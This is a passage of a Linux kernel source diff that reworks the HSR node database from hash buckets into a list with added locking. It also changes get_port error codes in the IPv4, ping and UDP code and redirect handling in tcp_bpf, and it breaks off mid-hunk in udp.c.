+@@ -500,7 +500,6 @@ static void handle_std_frame(struct sk_buff *skb,
+ {
+ 	struct hsr_port *port = frame->port_rcv;
+ 	struct hsr_priv *hsr = port->hsr;
+-	unsigned long irqflags;
+ 
+ 	frame->skb_hsr = NULL;
+ 	frame->skb_prp = NULL;
+@@ -510,10 +509,9 @@ static void handle_std_frame(struct sk_buff *skb,
+ 		frame->is_from_san = true;
+ 	} else {
+ 		/* Sequence nr for the master node */
+-		spin_lock_irqsave(&hsr->seqnr_lock, irqflags);
++		lockdep_assert_held(&hsr->seqnr_lock);
+ 		frame->sequence_nr = hsr->sequence_nr;
+ 		hsr->sequence_nr++;
+-		spin_unlock_irqrestore(&hsr->seqnr_lock, irqflags);
+ 	}
+ }
+ 
+@@ -571,23 +569,20 @@ static int fill_frame_info(struct hsr_frame_info *frame,
+ 	struct ethhdr *ethhdr;
+ 	__be16 proto;
+ 	int ret;
+-	u32 hash;
+ 
+ 	/* Check if skb contains ethhdr */
+ 	if (skb->mac_len < sizeof(struct ethhdr))
+ 		return -EINVAL;
+ 
+ 	memset(frame, 0, sizeof(*frame));
+-
+-	ethhdr = (struct ethhdr *)skb_mac_header(skb);
+-	hash = hsr_mac_hash(port->hsr, ethhdr->h_source);
+ 	frame->is_supervision = is_supervision_frame(port->hsr, skb);
+-	frame->node_src = hsr_get_node(port, &hsr->node_db[hash], skb,
++	frame->node_src = hsr_get_node(port, &hsr->node_db, skb,
+ 				       frame->is_supervision,
+ 				       port->type);
+ 	if (!frame->node_src)
+ 		return -1; /* Unknown node and !is_supervision, or no mem */
+ 
++	ethhdr = (struct ethhdr *)skb_mac_header(skb);
+ 	frame->is_vlan = false;
+ 	proto = ethhdr->h_proto;
+ 
+@@ -617,11 +612,13 @@ void hsr_forward_skb(struct sk_buff *skb, struct hsr_port *port)
+ {
+ 	struct hsr_frame_info frame;
+ 
++	rcu_read_lock();
+ 	if (fill_frame_info(&frame, skb, port) < 0)
+ 		goto out_drop;
+ 
+ 	hsr_register_frame_in(frame.node_src, port, frame.sequence_nr);
+ 	hsr_forward_do(&frame);
++	rcu_read_unlock();
+ 	/* Gets called for ingress frames as well as egress from master port.
+ 	 * So check and increment stats for master port only here.
+ 	 */
+@@ -636,6 +633,7 @@ void hsr_forward_skb(struct sk_buff *skb, struct hsr_port *port)
+ 	return;
+ 
+ out_drop:
++	rcu_read_unlock();
+ 	port->dev->stats.tx_dropped++;
+ 	kfree_skb(skb);
+ }
+diff --git a/net/hsr/hsr_framereg.c b/net/hsr/hsr_framereg.c
+index 584e217887997..39a6088080e93 100644
+--- a/net/hsr/hsr_framereg.c
++++ b/net/hsr/hsr_framereg.c
+@@ -15,37 +15,10 @@
+ #include <linux/etherdevice.h>
+ #include <linux/slab.h>
+ #include <linux/rculist.h>
+-#include <linux/jhash.h>
+ #include "hsr_main.h"
+ #include "hsr_framereg.h"
+ #include "hsr_netlink.h"
+ 
+-#ifdef CONFIG_LOCKDEP
+-int lockdep_hsr_is_held(spinlock_t *lock)
+-{
+-	return lockdep_is_held(lock);
+-}
+-#endif
+-
+-u32 hsr_mac_hash(struct hsr_priv *hsr, const unsigned char *addr)
+-{
+-	u32 hash = jhash(addr, ETH_ALEN, hsr->hash_seed);
+-
+-	return reciprocal_scale(hash, hsr->hash_buckets);
+-}
+-
+-struct hsr_node *hsr_node_get_first(struct hlist_head *head, spinlock_t *lock)
+-{
+-	struct hlist_node *first;
+-
+-	first = rcu_dereference_bh_check(hlist_first_rcu(head),
+-					 lockdep_hsr_is_held(lock));
+-	if (first)
+-		return hlist_entry(first, struct hsr_node, mac_list);
+-
+-	return NULL;
+-}
+-
+ /* seq_nr_after(a, b) - return true if a is after (higher in sequence than) b,
+  * false otherwise.
+  */
+@@ -67,7 +40,8 @@ bool hsr_addr_is_self(struct hsr_priv *hsr, unsigned char *addr)
+ {
+ 	struct hsr_node *node;
+ 
+-	node = hsr_node_get_first(&hsr->self_node_db, &hsr->list_lock);
++	node = list_first_or_null_rcu(&hsr->self_node_db, struct hsr_node,
++				      mac_list);
+ 	if (!node) {
+ 		WARN_ONCE(1, "HSR: No self node\n");
+ 		return false;
+@@ -83,12 +57,12 @@ bool hsr_addr_is_self(struct hsr_priv *hsr, unsigned char *addr)
+ 
+ /* Search for mac entry. Caller must hold rcu read lock.
+  */
+-static struct hsr_node *find_node_by_addr_A(struct hlist_head *node_db,
++static struct hsr_node *find_node_by_addr_A(struct list_head *node_db,
+ 					    const unsigned char addr[ETH_ALEN])
+ {
+ 	struct hsr_node *node;
+ 
+-	hlist_for_each_entry_rcu(node, node_db, mac_list) {
++	list_for_each_entry_rcu(node, node_db, mac_list) {
+ 		if (ether_addr_equal(node->macaddress_A, addr))
+ 			return node;
+ 	}
+@@ -103,7 +77,7 @@ int hsr_create_self_node(struct hsr_priv *hsr,
+ 			 const unsigned char addr_a[ETH_ALEN],
+ 			 const unsigned char addr_b[ETH_ALEN])
+ {
+-	struct hlist_head *self_node_db = &hsr->self_node_db;
++	struct list_head *self_node_db = &hsr->self_node_db;
+ 	struct hsr_node *node, *oldnode;
+ 
+ 	node = kmalloc(sizeof(*node), GFP_KERNEL);
+@@ -114,13 +88,14 @@ int hsr_create_self_node(struct hsr_priv *hsr,
+ 	ether_addr_copy(node->macaddress_B, addr_b);
+ 
+ 	spin_lock_bh(&hsr->list_lock);
+-	oldnode = hsr_node_get_first(self_node_db, &hsr->list_lock);
++	oldnode = list_first_or_null_rcu(self_node_db,
++					 struct hsr_node, mac_list);
+ 	if (oldnode) {
+-		hlist_replace_rcu(&oldnode->mac_list, &node->mac_list);
++		list_replace_rcu(&oldnode->mac_list, &node->mac_list);
+ 		spin_unlock_bh(&hsr->list_lock);
+ 		kfree_rcu(oldnode, rcu_head);
+ 	} else {
+-		hlist_add_tail_rcu(&node->mac_list, self_node_db);
++		list_add_tail_rcu(&node->mac_list, self_node_db);
+ 		spin_unlock_bh(&hsr->list_lock);
+ 	}
+ 
+@@ -129,25 +104,25 @@ int hsr_create_self_node(struct hsr_priv *hsr,
+ 
+ void hsr_del_self_node(struct hsr_priv *hsr)
+ {
+-	struct hlist_head *self_node_db = &hsr->self_node_db;
++	struct list_head *self_node_db = &hsr->self_node_db;
+ 	struct hsr_node *node;
+ 
+ 	spin_lock_bh(&hsr->list_lock);
+-	node = hsr_node_get_first(self_node_db, &hsr->list_lock);
++	node = list_first_or_null_rcu(self_node_db, struct hsr_node, mac_list);
+ 	if (node) {
+-		hlist_del_rcu(&node->mac_list);
++		list_del_rcu(&node->mac_list);
+ 		kfree_rcu(node, rcu_head);
+ 	}
+ 	spin_unlock_bh(&hsr->list_lock);
+ }
+ 
+-void hsr_del_nodes(struct hlist_head *node_db)
++void hsr_del_nodes(struct list_head *node_db)
+ {
+ 	struct hsr_node *node;
+-	struct hlist_node *tmp;
++	struct hsr_node *tmp;
+ 
+-	hlist_for_each_entry_safe(node, tmp, node_db, mac_list)
+-		kfree_rcu(node, rcu_head);
++	list_for_each_entry_safe(node, tmp, node_db, mac_list)
++		kfree(node);
+ }
+ 
+ void prp_handle_san_frame(bool san, enum hsr_port_type port,
+@@ -168,7 +143,7 @@ void prp_handle_san_frame(bool san, enum hsr_port_type port,
+  * originating from the newly added node.
+  */
+ static struct hsr_node *hsr_add_node(struct hsr_priv *hsr,
+-				     struct hlist_head *node_db,
++				     struct list_head *node_db,
+ 				     unsigned char addr[],
+ 				     u16 seq_out, bool san,
+ 				     enum hsr_port_type rx_port)
+@@ -182,6 +157,7 @@ static struct hsr_node *hsr_add_node(struct hsr_priv *hsr,
+ 		return NULL;
+ 
+ 	ether_addr_copy(new_node->macaddress_A, addr);
++	spin_lock_init(&new_node->seq_out_lock);
+ 
+ 	/* We are only interested in time diffs here, so use current jiffies
+ 	 * as initialization. (0 could trigger an spurious ring error warning).
+@@ -198,14 +174,14 @@ static struct hsr_node *hsr_add_node(struct hsr_priv *hsr,
+ 		hsr->proto_ops->handle_san_frame(san, rx_port, new_node);
+ 
+ 	spin_lock_bh(&hsr->list_lock);
+-	hlist_for_each_entry_rcu(node, node_db, mac_list,
+-				 lockdep_hsr_is_held(&hsr->list_lock)) {
++	list_for_each_entry_rcu(node, node_db, mac_list,
++				lockdep_is_held(&hsr->list_lock)) {
+ 		if (ether_addr_equal(node->macaddress_A, addr))
+ 			goto out;
+ 		if (ether_addr_equal(node->macaddress_B, addr))
+ 			goto out;
+ 	}
+-	hlist_add_tail_rcu(&new_node->mac_list, node_db);
++	list_add_tail_rcu(&new_node->mac_list, node_db);
+ 	spin_unlock_bh(&hsr->list_lock);
+ 	return new_node;
+ out:
+@@ -225,7 +201,7 @@ void prp_update_san_info(struct hsr_node *node, bool is_sup)
+ 
+ /* Get the hsr_node from which 'skb' was sent.
+  */
+-struct hsr_node *hsr_get_node(struct hsr_port *port, struct hlist_head *node_db,
++struct hsr_node *hsr_get_node(struct hsr_port *port, struct list_head *node_db,
+ 			      struct sk_buff *skb, bool is_sup,
+ 			      enum hsr_port_type rx_port)
+ {
+@@ -241,7 +217,7 @@ struct hsr_node *hsr_get_node(struct hsr_port *port, struct hlist_head *node_db,
+ 
+ 	ethhdr = (struct ethhdr *)skb_mac_header(skb);
+ 
+-	hlist_for_each_entry_rcu(node, node_db, mac_list) {
++	list_for_each_entry_rcu(node, node_db, mac_list) {
+ 		if (ether_addr_equal(node->macaddress_A, ethhdr->h_source)) {
+ 			if (hsr->proto_ops->update_san_info)
+ 				hsr->proto_ops->update_san_info(node, is_sup);
+@@ -291,12 +267,11 @@ void hsr_handle_sup_frame(struct hsr_frame_info *frame)
+ 	struct hsr_sup_tlv *hsr_sup_tlv;
+ 	struct hsr_node *node_real;
+ 	struct sk_buff *skb = NULL;
+-	struct hlist_head *node_db;
++	struct list_head *node_db;
+ 	struct ethhdr *ethhdr;
+ 	int i;
+ 	unsigned int pull_size = 0;
+ 	unsigned int total_pull_size = 0;
+-	u32 hash;
+ 
+ 	/* Here either frame->skb_hsr or frame->skb_prp should be
+ 	 * valid as supervision frame always will have protocol
+@@ -334,13 +309,11 @@ void hsr_handle_sup_frame(struct hsr_frame_info *frame)
+ 	hsr_sp = (struct hsr_sup_payload *)skb->data;
+ 
+ 	/* Merge node_curr (registered on macaddress_B) into node_real */
+-	node_db = port_rcv->hsr->node_db;
+-	hash = hsr_mac_hash(hsr, hsr_sp->macaddress_A);
+-	node_real = find_node_by_addr_A(&node_db[hash], hsr_sp->macaddress_A);
++	node_db = &port_rcv->hsr->node_db;
++	node_real = find_node_by_addr_A(node_db, hsr_sp->macaddress_A);
+ 	if (!node_real)
+ 		/* No frame received from AddrA of this node yet */
+-		node_real = hsr_add_node(hsr, &node_db[hash],
+-					 hsr_sp->macaddress_A,
++		node_real = hsr_add_node(hsr, node_db, hsr_sp->macaddress_A,
+ 					 HSR_SEQNR_START - 1, true,
+ 					 port_rcv->type);
+ 	if (!node_real)
+@@ -374,14 +347,14 @@ void hsr_handle_sup_frame(struct hsr_frame_info *frame)
+ 		hsr_sp = (struct hsr_sup_payload *)skb->data;
+ 
+ 		/* Check if redbox mac and node mac are equal. */
+-		if (!ether_addr_equal(node_real->macaddress_A,
+-				      hsr_sp->macaddress_A)) {
++		if (!ether_addr_equal(node_real->macaddress_A, hsr_sp->macaddress_A)) {
+ 			/* This is a redbox supervision frame for a VDAN! */
+ 			goto done;
+ 		}
+ 	}
+ 
+ 	ether_addr_copy(node_real->macaddress_B, ethhdr->h_source);
++	spin_lock_bh(&node_real->seq_out_lock);
+ 	for (i = 0; i < HSR_PT_PORTS; i++) {
+ 		if (!node_curr->time_in_stale[i] &&
+ 		    time_after(node_curr->time_in[i], node_real->time_in[i])) {
+@@ -392,12 +365,16 @@ void hsr_handle_sup_frame(struct hsr_frame_info *frame)
+ 		if (seq_nr_after(node_curr->seq_out[i], node_real->seq_out[i]))
+ 			node_real->seq_out[i] = node_curr->seq_out[i];
+ 	}
++	spin_unlock_bh(&node_real->seq_out_lock);
+ 	node_real->addr_B_port = port_rcv->type;
+ 
+ 	spin_lock_bh(&hsr->list_lock);
+-	hlist_del_rcu(&node_curr->mac_list);
++	if (!node_curr->removed) {
++		list_del_rcu(&node_curr->mac_list);
++		node_curr->removed = true;
++		kfree_rcu(node_curr, rcu_head);
++	}
+ 	spin_unlock_bh(&hsr->list_lock);
+-	kfree_rcu(node_curr, rcu_head);
+ 
+ done:
+ 	/* Push back here */
+@@ -433,7 +410,6 @@ void hsr_addr_subst_dest(struct hsr_node *node_src, struct sk_buff *skb,
+ 			 struct hsr_port *port)
+ {
+ 	struct hsr_node *node_dst;
+-	u32 hash;
+ 
+ 	if (!skb_mac_header_was_set(skb)) {
+ 		WARN_ONCE(1, "%s: Mac header not set\n", __func__);
+@@ -443,8 +419,7 @@ void hsr_addr_subst_dest(struct hsr_node *node_src, struct sk_buff *skb,
+ 	if (!is_unicast_ether_addr(eth_hdr(skb)->h_dest))
+ 		return;
+ 
+-	hash = hsr_mac_hash(port->hsr, eth_hdr(skb)->h_dest);
+-	node_dst = find_node_by_addr_A(&port->hsr->node_db[hash],
++	node_dst = find_node_by_addr_A(&port->hsr->node_db,
+ 				       eth_hdr(skb)->h_dest);
+ 	if (!node_dst) {
+ 		if (net_ratelimit())
+@@ -484,13 +459,17 @@ void hsr_register_frame_in(struct hsr_node *node, struct hsr_port *port,
+ int hsr_register_frame_out(struct hsr_port *port, struct hsr_node *node,
+ 			   u16 sequence_nr)
+ {
++	spin_lock_bh(&node->seq_out_lock);
+ 	if (seq_nr_before_or_eq(sequence_nr, node->seq_out[port->type]) &&
+ 	    time_is_after_jiffies(node->time_out[port->type] +
+-	    msecs_to_jiffies(HSR_ENTRY_FORGET_TIME)))
++	    msecs_to_jiffies(HSR_ENTRY_FORGET_TIME))) {
++		spin_unlock_bh(&node->seq_out_lock);
+ 		return 1;
++	}
+ 
+ 	node->time_out[port->type] = jiffies;
+ 	node->seq_out[port->type] = sequence_nr;
++	spin_unlock_bh(&node->seq_out_lock);
+ 	return 0;
+ }
+ 
+@@ -520,71 +499,60 @@ static struct hsr_port *get_late_port(struct hsr_priv *hsr,
+ void hsr_prune_nodes(struct timer_list *t)
+ {
+ 	struct hsr_priv *hsr = from_timer(hsr, t, prune_timer);
+-	struct hlist_node *tmp;
+ 	struct hsr_node *node;
++	struct hsr_node *tmp;
+ 	struct hsr_port *port;
+ 	unsigned long timestamp;
+ 	unsigned long time_a, time_b;
+-	int i;
+ 
+ 	spin_lock_bh(&hsr->list_lock);
++	list_for_each_entry_safe(node, tmp, &hsr->node_db, mac_list) {
++		/* Don't prune own node. Neither time_in[HSR_PT_SLAVE_A]
++		 * nor time_in[HSR_PT_SLAVE_B], will ever be updated for
++		 * the master port. Thus the master node will be repeatedly
++		 * pruned leading to packet loss.
++		 */
++		if (hsr_addr_is_self(hsr, node->macaddress_A))
++			continue;
++
++		/* Shorthand */
++		time_a = node->time_in[HSR_PT_SLAVE_A];
++		time_b = node->time_in[HSR_PT_SLAVE_B];
++
++		/* Check for timestamps old enough to risk wrap-around */
++		if (time_after(jiffies, time_a + MAX_JIFFY_OFFSET / 2))
++			node->time_in_stale[HSR_PT_SLAVE_A] = true;
++		if (time_after(jiffies, time_b + MAX_JIFFY_OFFSET / 2))
++			node->time_in_stale[HSR_PT_SLAVE_B] = true;
++
++		/* Get age of newest frame from node.
++		 * At least one time_in is OK here; nodes get pruned long
++		 * before both time_ins can get stale
++		 */
++		timestamp = time_a;
++		if (node->time_in_stale[HSR_PT_SLAVE_A] ||
++		    (!node->time_in_stale[HSR_PT_SLAVE_B] &&
++		    time_after(time_b, time_a)))
++			timestamp = time_b;
++
++		/* Warn of ring error only as long as we get frames at all */
++		if (time_is_after_jiffies(timestamp +
++				msecs_to_jiffies(1.5 * MAX_SLAVE_DIFF))) {
++			rcu_read_lock();
++			port = get_late_port(hsr, node);
++			if (port)
++				hsr_nl_ringerror(hsr, node->macaddress_A, port);
++			rcu_read_unlock();
++		}
+ 
+-	for (i = 0; i < hsr->hash_buckets; i++) {
+-		hlist_for_each_entry_safe(node, tmp, &hsr->node_db[i],
+-					  mac_list) {
+-			/* Don't prune own node.
+-			 * Neither time_in[HSR_PT_SLAVE_A]
+-			 * nor time_in[HSR_PT_SLAVE_B], will ever be updated
+-			 * for the master port. Thus the master node will be
+-			 * repeatedly pruned leading to packet loss.
+-			 */
+-			if (hsr_addr_is_self(hsr, node->macaddress_A))
+-				continue;
+-
+-			/* Shorthand */
+-			time_a = node->time_in[HSR_PT_SLAVE_A];
+-			time_b = node->time_in[HSR_PT_SLAVE_B];
+-
+-			/* Check for timestamps old enough to
+-			 * risk wrap-around
+-			 */
+-			if (time_after(jiffies, time_a + MAX_JIFFY_OFFSET / 2))
+-				node->time_in_stale[HSR_PT_SLAVE_A] = true;
+-			if (time_after(jiffies, time_b + MAX_JIFFY_OFFSET / 2))
+-				node->time_in_stale[HSR_PT_SLAVE_B] = true;
+-
+-			/* Get age of newest frame from node.
+-			 * At least one time_in is OK here; nodes get pruned
+-			 * long before both time_ins can get stale
+-			 */
+-			timestamp = time_a;
+-			if (node->time_in_stale[HSR_PT_SLAVE_A] ||
+-			    (!node->time_in_stale[HSR_PT_SLAVE_B] &&
+-			     time_after(time_b, time_a)))
+-				timestamp = time_b;
+-
+-			/* Warn of ring error only as long as we get
+-			 * frames at all
+-			 */
+-			if (time_is_after_jiffies(timestamp +
+-						  msecs_to_jiffies(1.5 * MAX_SLAVE_DIFF))) {
+-				rcu_read_lock();
+-				port = get_late_port(hsr, node);
+-				if (port)
+-					hsr_nl_ringerror(hsr,
+-							 node->macaddress_A,
+-							 port);
+-				rcu_read_unlock();
+-			}
+-
+-			/* Prune old entries */
+-			if (time_is_before_jiffies(timestamp +
+-						   msecs_to_jiffies(HSR_NODE_FORGET_TIME))) {
+-				hsr_nl_nodedown(hsr, node->macaddress_A);
+-				hlist_del_rcu(&node->mac_list);
+-				/* Note that we need to free this
+-				 * entry later:
+-				 */
++		/* Prune old entries */
++		if (time_is_before_jiffies(timestamp +
++				msecs_to_jiffies(HSR_NODE_FORGET_TIME))) {
++			hsr_nl_nodedown(hsr, node->macaddress_A);
++			if (!node->removed) {
++				list_del_rcu(&node->mac_list);
++				node->removed = true;
++				/* Note that we need to free this entry later: */
+ 				kfree_rcu(node, rcu_head);
+ 			}
+ 		}
+@@ -600,20 +568,17 @@ void *hsr_get_next_node(struct hsr_priv *hsr, void *_pos,
+ 			unsigned char addr[ETH_ALEN])
+ {
+ 	struct hsr_node *node;
+-	u32 hash;
+-
+-	hash = hsr_mac_hash(hsr, addr);
+ 
+ 	if (!_pos) {
+-		node = hsr_node_get_first(&hsr->node_db[hash],
+-					  &hsr->list_lock);
++		node = list_first_or_null_rcu(&hsr->node_db,
++					      struct hsr_node, mac_list);
+ 		if (node)
+ 			ether_addr_copy(addr, node->macaddress_A);
+ 		return node;
+ 	}
+ 
+ 	node = _pos;
+-	hlist_for_each_entry_continue_rcu(node, mac_list) {
++	list_for_each_entry_continue_rcu(node, &hsr->node_db, mac_list) {
+ 		ether_addr_copy(addr, node->macaddress_A);
+ 		return node;
+ 	}
+@@ -633,11 +598,8 @@ int hsr_get_node_data(struct hsr_priv *hsr,
+ 	struct hsr_node *node;
+ 	struct hsr_port *port;
+ 	unsigned long tdiff;
+-	u32 hash;
+-
+-	hash = hsr_mac_hash(hsr, addr);
+ 
+-	node = find_node_by_addr_A(&hsr->node_db[hash], addr);
++	node = find_node_by_addr_A(&hsr->node_db, addr);
+ 	if (!node)
+ 		return -ENOENT;
+ 
+diff --git a/net/hsr/hsr_framereg.h b/net/hsr/hsr_framereg.h
+index f3762e9e42b54..b23556251d621 100644
+--- a/net/hsr/hsr_framereg.h
++++ b/net/hsr/hsr_framereg.h
+@@ -28,17 +28,9 @@ struct hsr_frame_info {
+ 	bool is_from_san;
+ };
+ 
+-#ifdef CONFIG_LOCKDEP
+-int lockdep_hsr_is_held(spinlock_t *lock);
+-#else
+-#define lockdep_hsr_is_held(lock)	1
+-#endif
+-
+-u32 hsr_mac_hash(struct hsr_priv *hsr, const unsigned char *addr);
+-struct hsr_node *hsr_node_get_first(struct hlist_head *head, spinlock_t *lock);
+ void hsr_del_self_node(struct hsr_priv *hsr);
+-void hsr_del_nodes(struct hlist_head *node_db);
+-struct hsr_node *hsr_get_node(struct hsr_port *port, struct hlist_head *node_db,
++void hsr_del_nodes(struct list_head *node_db);
++struct hsr_node *hsr_get_node(struct hsr_port *port, struct list_head *node_db,
+ 			      struct sk_buff *skb, bool is_sup,
+ 			      enum hsr_port_type rx_port);
+ void hsr_handle_sup_frame(struct hsr_frame_info *frame);
+@@ -76,7 +68,9 @@ void prp_handle_san_frame(bool san, enum hsr_port_type port,
+ void prp_update_san_info(struct hsr_node *node, bool is_sup);
+ 
+ struct hsr_node {
+-	struct hlist_node	mac_list;
++	struct list_head	mac_list;
++	/* Protect R/W access to seq_out */
++	spinlock_t		seq_out_lock;
+ 	unsigned char		macaddress_A[ETH_ALEN];
+ 	unsigned char		macaddress_B[ETH_ALEN];
+ 	/* Local slave through which AddrB frames are received from this node */
+@@ -88,6 +82,7 @@ struct hsr_node {
+ 	bool			san_a;
+ 	bool			san_b;
+ 	u16			seq_out[HSR_PT_PORTS];
++	bool			removed;
+ 	struct rcu_head		rcu_head;
+ };
+ 
+diff --git a/net/hsr/hsr_main.h b/net/hsr/hsr_main.h
+index b158ba409f9a4..16ae9fb09ccd2 100644
+--- a/net/hsr/hsr_main.h
++++ b/net/hsr/hsr_main.h
+@@ -47,9 +47,6 @@
+ 
+ #define HSR_V1_SUP_LSDUSIZE		52
+ 
+-#define HSR_HSIZE_SHIFT	8
+-#define HSR_HSIZE	BIT(HSR_HSIZE_SHIFT)
+-
+ /* The helper functions below assumes that 'path' occupies the 4 most
+  * significant bits of the 16-bit field shared by 'path' and 'LSDU_size' (or
+  * equivalently, the 4 most significant bits of HSR tag byte 14).
+@@ -188,8 +185,8 @@ struct hsr_proto_ops {
+ struct hsr_priv {
+ 	struct rcu_head		rcu_head;
+ 	struct list_head	ports;
+-	struct hlist_head	node_db[HSR_HSIZE];	/* Known HSR nodes */
+-	struct hlist_head	self_node_db;	/* MACs of slaves */
++	struct list_head	node_db;	/* Known HSR nodes */
++	struct list_head	self_node_db;	/* MACs of slaves */
+ 	struct timer_list	announce_timer;	/* Supervision frame dispatch */
+ 	struct timer_list	prune_timer;
+ 	int announce_count;
+@@ -199,8 +196,6 @@ struct hsr_priv {
+ 	spinlock_t seqnr_lock;	/* locking for sequence_nr */
+ 	spinlock_t list_lock;	/* locking for node list */
+ 	struct hsr_proto_ops	*proto_ops;
+-	u32 hash_buckets;
+-	u32 hash_seed;
+ #define PRP_LAN_ID	0x5     /* 0x1010 for A and 0x1011 for B. Bit 0 is set
+ 				 * based on SLAVE_A or SLAVE_B
+ 				 */
+diff --git a/net/hsr/hsr_netlink.c b/net/hsr/hsr_netlink.c
+index 7174a90929002..78fe40eb9f012 100644
+--- a/net/hsr/hsr_netlink.c
++++ b/net/hsr/hsr_netlink.c
+@@ -105,7 +105,6 @@ static int hsr_newlink(struct net *src_net, struct net_device *dev,
+ static void hsr_dellink(struct net_device *dev, struct list_head *head)
+ {
+ 	struct hsr_priv *hsr = netdev_priv(dev);
+-	int i;
+ 
+ 	del_timer_sync(&hsr->prune_timer);
+ 	del_timer_sync(&hsr->announce_timer);
+@@ -114,8 +113,7 @@ static void hsr_dellink(struct net_device *dev, struct list_head *head)
+ 	hsr_del_ports(hsr);
+ 
+ 	hsr_del_self_node(hsr);
+-	for (i = 0; i < hsr->hash_buckets; i++)
+-		hsr_del_nodes(&hsr->node_db[i]);
++	hsr_del_nodes(&hsr->node_db);
+ 
+ 	unregister_netdevice_queue(dev, head);
+ }
+diff --git a/net/ipv4/af_inet.c b/net/ipv4/af_inet.c
+index 0da6794113308..92d4237862518 100644
+--- a/net/ipv4/af_inet.c
++++ b/net/ipv4/af_inet.c
+@@ -522,9 +522,9 @@ int __inet_bind(struct sock *sk, struct sockaddr *uaddr, int addr_len,
+ 	/* Make sure we are allowed to bind here. */
+ 	if (snum || !(inet->bind_address_no_port ||
+ 		      (flags & BIND_FORCE_ADDRESS_NO_PORT))) {
+-		if (sk->sk_prot->get_port(sk, snum)) {
++		err = sk->sk_prot->get_port(sk, snum);
++		if (err) {
+ 			inet->inet_saddr = inet->inet_rcv_saddr = 0;
+-			err = -EADDRINUSE;
+ 			goto out_release_sock;
+ 		}
+ 		if (!(flags & BIND_FROM_BPF)) {
+diff --git a/net/ipv4/inet_connection_sock.c b/net/ipv4/inet_connection_sock.c
+index 4e84ed21d16fe..4a34bc7cb15ed 100644
+--- a/net/ipv4/inet_connection_sock.c
++++ b/net/ipv4/inet_connection_sock.c
+@@ -471,11 +471,11 @@ int inet_csk_get_port(struct sock *sk, unsigned short snum)
+ 	bool reuse = sk->sk_reuse && sk->sk_state != TCP_LISTEN;
+ 	bool found_port = false, check_bind_conflict = true;
+ 	bool bhash_created = false, bhash2_created = false;
++	int ret = -EADDRINUSE, port = snum, l3mdev;
+ 	struct inet_bind_hashbucket *head, *head2;
+ 	struct inet_bind2_bucket *tb2 = NULL;
+ 	struct inet_bind_bucket *tb = NULL;
+ 	bool head2_lock_acquired = false;
+-	int ret = 1, port = snum, l3mdev;
+ 	struct net *net = sock_net(sk);
+ 
+ 	l3mdev = inet_sk_bound_l3mdev(sk);
+@@ -1186,7 +1186,7 @@ int inet_csk_listen_start(struct sock *sk)
+ {
+ 	struct inet_connection_sock *icsk = inet_csk(sk);
+ 	struct inet_sock *inet = inet_sk(sk);
+-	int err = -EADDRINUSE;
++	int err;
+ 
+ 	reqsk_queue_alloc(&icsk->icsk_accept_queue);
+ 
+@@ -1202,7 +1202,8 @@ int inet_csk_listen_start(struct sock *sk)
+ 	 * after validation is complete.
+ 	 */
+ 	inet_sk_state_store(sk, TCP_LISTEN);
+-	if (!sk->sk_prot->get_port(sk, inet->inet_num)) {
++	err = sk->sk_prot->get_port(sk, inet->inet_num);
++	if (!err) {
+ 		inet->inet_sport = htons(inet->inet_num);
+ 
+ 		sk_dst_reset(sk);
+diff --git a/net/ipv4/ping.c b/net/ipv4/ping.c
+index 04b4ec07bb06c..409ec2a1f95b0 100644
+--- a/net/ipv4/ping.c
++++ b/net/ipv4/ping.c
+@@ -143,7 +143,7 @@ next_port:
+ 
+ fail:
+ 	spin_unlock(&ping_table.lock);
+-	return 1;
++	return -EADDRINUSE;
+ }
+ EXPORT_SYMBOL_GPL(ping_get_port);
+ 
+diff --git a/net/ipv4/tcp_bpf.c b/net/ipv4/tcp_bpf.c
+index cf9c3e8f7ccbf..94aad3870c5fc 100644
+--- a/net/ipv4/tcp_bpf.c
++++ b/net/ipv4/tcp_bpf.c
+@@ -45,8 +45,11 @@ static int bpf_tcp_ingress(struct sock *sk, struct sk_psock *psock,
+ 		tmp->sg.end = i;
+ 		if (apply) {
+ 			apply_bytes -= size;
+-			if (!apply_bytes)
++			if (!apply_bytes) {
++				if (sge->length)
++					sk_msg_iter_var_prev(i);
+ 				break;
++			}
+ 		}
+ 	} while (i != msg->sg.end);
+ 
+@@ -131,10 +134,9 @@ static int tcp_bpf_push_locked(struct sock *sk, struct sk_msg *msg,
+ 	return ret;
+ }
+ 
+-int tcp_bpf_sendmsg_redir(struct sock *sk, struct sk_msg *msg,
+-			  u32 bytes, int flags)
++int tcp_bpf_sendmsg_redir(struct sock *sk, bool ingress,
++			  struct sk_msg *msg, u32 bytes, int flags)
+ {
+-	bool ingress = sk_msg_to_ingress(msg);
+ 	struct sk_psock *psock = sk_psock_get(sk);
+ 	int ret;
+ 
+@@ -276,10 +278,10 @@ msg_bytes_ready:
+ static int tcp_bpf_send_verdict(struct sock *sk, struct sk_psock *psock,
+ 				struct sk_msg *msg, int *copied, int flags)
+ {
+-	bool cork = false, enospc = sk_msg_full(msg);
++	bool cork = false, enospc = sk_msg_full(msg), redir_ingress;
+ 	struct sock *sk_redir;
+ 	u32 tosend, origsize, sent, delta = 0;
+-	u32 eval = __SK_NONE;
++	u32 eval;
+ 	int ret;
+ 
+ more_data:
+@@ -310,6 +312,7 @@ more_data:
+ 	tosend = msg->sg.size;
+ 	if (psock->apply_bytes && psock->apply_bytes < tosend)
+ 		tosend = psock->apply_bytes;
++	eval = __SK_NONE;
+ 
+ 	switch (psock->eval) {
+ 	case __SK_PASS:
+@@ -321,6 +324,7 @@ more_data:
+ 		sk_msg_apply_bytes(psock, tosend);
+ 		break;
+ 	case __SK_REDIRECT:
++		redir_ingress = psock->redir_ingress;
+ 		sk_redir = psock->sk_redir;
+ 		sk_msg_apply_bytes(psock, tosend);
+ 		if (!psock->apply_bytes) {
+@@ -337,7 +341,8 @@ more_data:
+ 		release_sock(sk);
+ 
+ 		origsize = msg->sg.size;
+-		ret = tcp_bpf_sendmsg_redir(sk_redir, msg, tosend, flags);
++		ret = tcp_bpf_sendmsg_redir(sk_redir, redir_ingress,
++					    msg, tosend, flags);
+ 		sent = origsize - msg->sg.size;
+ 
+ 		if (eval == __SK_REDIRECT)
+diff --git a/net/ipv4/udp.c b/net/ipv4/udp.c
+index 6a320a614e547..2eaf47e23b221 100644
+--- a/net/ipv4/udp.c
++++ b/net/ipv4/udp.c
+@@ -232,16 +232,16 @@ static int udp_reuseport_add_sock(struct sock *sk, struct udp_hslot *hslot)
+ int udp_lib_get_port(struct sock *sk, unsigned short snum,
+ 		     unsigned int hash2_nulladdr)
+ {
+-	struct udp_hslot *hslot, *hslot2;
+ 	struct udp_table *udptable = sk->sk_prot->h.udp_table;
+-	int    error = 1;
++	struct udp_hslot *hslot, *hslot2;
+ 	struct net *net = sock_net(sk);
